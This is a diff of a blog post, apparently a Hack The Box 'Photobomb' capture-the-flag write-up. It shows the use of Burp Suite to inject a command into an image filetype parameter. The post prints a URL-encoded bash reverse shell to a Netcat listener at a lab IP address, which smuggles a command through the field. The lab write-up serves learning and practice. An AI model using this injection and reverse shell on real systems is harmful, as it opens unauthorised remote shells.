lazy29t/lazy29t.github.io/_posts/2023-02-23-Photobomb.md

 In that step we are using a proxy tool called [**Burpsuite**] and let's start to test.

 ### Proxy
-So in this panel tell us that we are unable to download any picture from this page, well with the help our proxy we can see what request leave it us
+So in this panel tell us that we are unable to download any picture from this page, well with the help our proxy we can see what request leave it us:

+How we can see the request
 ![HTB Img](/assets/img//HTB/EASY/request.png)

-so with that, send it to repeater for start to test

 ![HTB Img](/assets/img//HTB/EASY/repeater.png)

-verify the response with a 500 code **Internal Server Error** we are going to test if it works to do a [**reverse shell**], on filetype parameter we are put to next to `jpg` adding `;` and write the next reverse shell *(PD: encoded on url because we'll have an error from the syntaxis)* on my case I'll use from *bash* method with **Netcat** listener
+verify the response with a **500 code** **[Internal Server Error]** we are going to test if it works to do a [**reverse shell**], on filetype parameter we are put to next to `jpg` adding `;` and write the next reverse shell *(PD: encoded on url because we'll have an error from the syntaxis)* on my case I'll use from *bash* method with **Netcat** listener

 ```console
 bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.17%2F4040%200%3E%261